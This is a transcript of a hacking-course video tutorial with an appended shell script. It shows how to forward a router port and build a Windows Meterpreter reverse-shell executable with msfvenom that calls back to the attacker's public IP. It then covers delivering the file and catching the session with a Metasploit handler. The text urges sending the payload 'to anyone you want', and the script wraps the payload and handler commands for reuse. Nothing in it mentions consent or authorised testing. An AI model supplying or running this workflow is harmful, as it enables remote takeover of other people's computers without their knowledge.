Learn System Hacking E16: Meterpreter Over Internet with Port Forwarding


Hello everybody and welcome back. In the previous videos we looked at some of the post exploitation modules that you can run against a target. Those were only a few of them; there are many more that we will not cover, since there is no time for that. If you want to, you can browse them in the Metasploit modules directory, or simply search for them from the Metasploit framework console. I will open the console now anyway, since we will need it later in this video, where I will show you how to run the attack over the Internet.

But before I do that, let me show you how to list all of the post exploitation modules. Once msfconsole opens, type search post/windows and it will print all of the post exploitation modules you can use against Windows (let me zoom out a bit so they fit on the screen). You can tell they are post modules because their names start with post. For example, one of them lets you check the USB history of the target, and since we plugged a USB drive into that machine earlier, it should show up there. I do not have a session open at the moment, so I will not run that module now, but you can check it out yourself. More about that later on.

What we want to do right now is set up port forwarding, so that this attack works against a PC anywhere on the Internet and not only on our local network. So, how do we do port forwarding? Open up Firefox. You will need to log in to your router, so you need to know your router's username and password. After that you find the port forwarding section; let me show you. Enter your router's IP address in the address bar (in my case it ends in .1.1) and press Enter. It prompts me with a login screen, I type my username and password, and I choose not to save them.

Every router's interface is different, so what you are looking for is the port forwarding section. I am not even sure where it is in mine; it is not under Wireless, it could be under NAT. NAT, port forwarding: found it. Here you have a set of rules, and each rule has a few fields. The rule index is not really important, and neither is the application name. What matters is the protocol, which you want to set to TCP, and the ports. Set the start port to the port you want to forward, let's say 5555, and set the end port to 5555 as well. The local IP address is the address of your Kali Linux machine; if I run ifconfig, mine ends in .1.4. So check your own address with ifconfig and enter it in the local IP address field. The local start port and local end port can also be 5555, since these correspond to the same options as the external start and end port (the router rewrites the destination address, so the external and internal ports do not have to be equal, but keeping them equal avoids confusion). Two things worth checking at this point: the Kali machine should keep that local address (a DHCP reservation or a static address), otherwise the rule silently points at the wrong host after a reboot, and your ISP must actually give your router a public address; if it sits behind carrier-grade NAT, nothing from the Internet will ever reach this rule.

Once you have set the port you want to forward to your local machine and the IP address of that machine, click submit, or whatever the button is called on your router. After submitting we can see that the port forward for this IP address and this port has been created successfully.

Now that the port is forwarded, the only thing you need to change compared to the previous attacks is the LHOST in the msfvenom payload: instead of your local IP address you give it your public IP address. To find it, just search for "what is my IP" in the browser and it will show your public IP address; currently, for me, it is the one shown here. So in the payload creation, instead of LHOST being your local address (.1.4 in my case), you specify this public IP address. Keep in mind that a residential public address is often dynamic; if it changes, the payload you already generated calls back to the wrong place and has to be regenerated.

Let me show you how to do that. Switch to root, check the working directory, and create the payload with msfvenom -p and the same payload as before, the Meterpreter reverse TCP payload. It has to match the payload you set on the handler later, so for a 64-bit Windows 10 target that is windows/x64/meterpreter/reverse_tcp. For LHOST=, instead of the local IP address, paste your public IP address. For LPORT, set the port that you forwarded, which in our case is 5555; if you forwarded a different port, use that one instead. So LPORT=5555, and after that everything is the same as before: the format is exe (-f exe) and the output file, which I will call wanshell.exe. Put together, the command is msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<your public IP> LPORT=5555 -f exe -o wanshell.exe. Wait for msfvenom to finish creating the payload.

Once the payload exists you can send it to anyone you want, to a PC on another continent if you like. When that PC runs it, it will attempt a TCP connection to your public IP on port 5555. Your router has a rule saying that this port is forwarded to the .1.4 local IP address, so it forwards the connection to your Kali Linux machine. If I type ls we can see that wanshell.exe has been created.

Now I want to get it onto the Windows 10 machine. I will plug in my USB drive, a Kingston DataTraveler; you could also serve the file over Apache2 if you prefer, it does not really matter. Then I copy wanshell.exe onto the USB drive with cp wanshell.exe followed by the path of the mounted drive; I am doing this in a regular terminal, and you can do it from the file manager instead. Now the wanshell is on the drive, so I unmount it and, in the VM settings, uncheck it from Kali so that it attaches to the Windows 10 machine instead. Let me see whether it pops up on its own or whether I have to re-plug it. It is not popping up, but that does not matter: I just browse to the drive, there is wanshell, and I copy it to the desktop.

Now I want to set up the listener, same as before. Type use exploit/multi/handler, then set payload windows/x64/meterpreter/reverse_tcp. I am going over this quickly since I already covered it; whoops, I made a typo. Then show options: everything is set except LHOST. Here LHOST is your local IP address, not the public one. The handler binds a socket on the Kali machine, and that machine only has the local address (.1.4); the public address belongs to the router's WAN interface, so trying to bind it would fail. Then type exploit -j -z, which runs the handler as a background job. Now if I run wanshell.exe on the Windows machine, we should get a reverse shell back within a few seconds.

Oops, we are not getting it. The reason, which I just noticed, is that I left LPORT at its default of 4444 instead of 5555, the port specified in the port forwarding rule. So let's do this again. Use exploit/multi/handler, check with jobs, and kill the job I started earlier that is listening on port 4444. Show options to check that everything is set, change LPORT to 5555, and run exploit -j -z again to start the listener. This time, when we run wanshell.exe, we get the connection from our Windows 10 machine. A quick way to avoid this mistake in the first place: with the handler running, connect to your public IP on the forwarded port from outside your network (a phone on mobile data with a port-check tool, or nc from another host). If that connection is refused or times out, the problem is the router rule, the handler's LPORT or the ISP, not the payload.

This will now work for any machine on the Internet: wherever that machine is, it will be able to connect back to you, since we forwarded the port on the router. We can even see that we are not getting the connection from a local IP but from the public IP. If I run sessions -i 1 and then getuid, we can see we have successfully gained a session on a target machine that is not on our local network. My Windows 10 machine really is on the local network, but the process looks the same: the traffic went to the public address and came back in through the router. One caveat: testing from inside your own LAN like this only works if the router supports NAT loopback (hairpin NAT). If yours does not, the test from the internal machine fails even though the forwarding rule is correct, and you have to test from outside the network. With this process you will be able to connect to any machine in the world.

So that would be about it for this tutorial. I hope you enjoyed it and I hope I see you in the next one. Bye!
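The mistake in the video (payload built for 5555, handler left on 4444) happens because the forwarded port is typed in three places by hand. As an added example that is not part of the original tutorial, the following POSIX shell helpers keep the port in one variable, generate the msfvenom command and a msfconsole resource script from it, and check that something is actually listening before you send the payload anywhere. The public IP, the local IP, the output file name and the use of windows/x64/meterpreter/reverse_tcp are assumptions supplied by the caller, not values from the page.

```shell
#!/bin/sh
# Added example (not from the tutorial): one source of truth for the forwarded
# port so the msfvenom payload and the multi/handler can never disagree.
# Assumed values: FWD_PORT defaults to 5555 as in the video; PUBLIC_IP and
# LOCAL_IP are passed in by the caller; payload is the x64 Meterpreter stager.

FWD_PORT="${FWD_PORT:-5555}"
PAYLOAD="windows/x64/meterpreter/reverse_tcp"

# Print the msfvenom command line for a payload that calls back to the
# PUBLIC address on the forwarded port (this is what the target runs).
venom_cmd() {
  public_ip="$1"; port="$2"; out="$3"
  printf 'msfvenom -p %s LHOST=%s LPORT=%s -f exe -o %s\n' \
    "$PAYLOAD" "$public_ip" "$port" "$out"
}

# Emit a msfconsole resource script for the handler. The handler binds a
# LOCAL address (0.0.0.0 = every interface on the Kali box); binding the
# public IP would fail because the router, not Kali, owns that address.
# ExitOnSession false keeps the handler alive after the first session.
handler_rc() {
  local_ip="$1"; port="$2"
  cat <<EOF
use exploit/multi/handler
set PAYLOAD $PAYLOAD
set LHOST $local_ip
set LPORT $port
set ExitOnSession false
exploit -j -z
EOF
}

# Pre-flight check: is a TCP listener bound on the forwarded port?
# Exit status 0 if yes. Uses ss(8), falling back to netstat(8).
port_listening() {
  port="$1"
  if command -v ss >/dev/null 2>&1; then
    ss -ltn 2>/dev/null | awk '{print $4}' | grep -q ":${port}\$"
  else
    netstat -ltn 2>/dev/null | awk '{print $4}' | grep -q ":${port}\$"
  fi
}

# Cross-check two port values (e.g. router rule vs handler); 0 on match.
ports_match() { [ "$1" = "$2" ]; }

# Example usage (IPs are placeholders, not addresses from the page):
#   venom_cmd 203.0.113.10 "$FWD_PORT" wanshell.exe
#   handler_rc 0.0.0.0 "$FWD_PORT" > handler.rc && msfconsole -q -r handler.rc
#   port_listening "$FWD_PORT" && echo "handler is up on $FWD_PORT"
```

Run port_listening only after msfconsole has started the handler; it tells you the handler side is correct, but it cannot see the router rule, so the external connection test described above is still needed to prove the forward works end to end.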
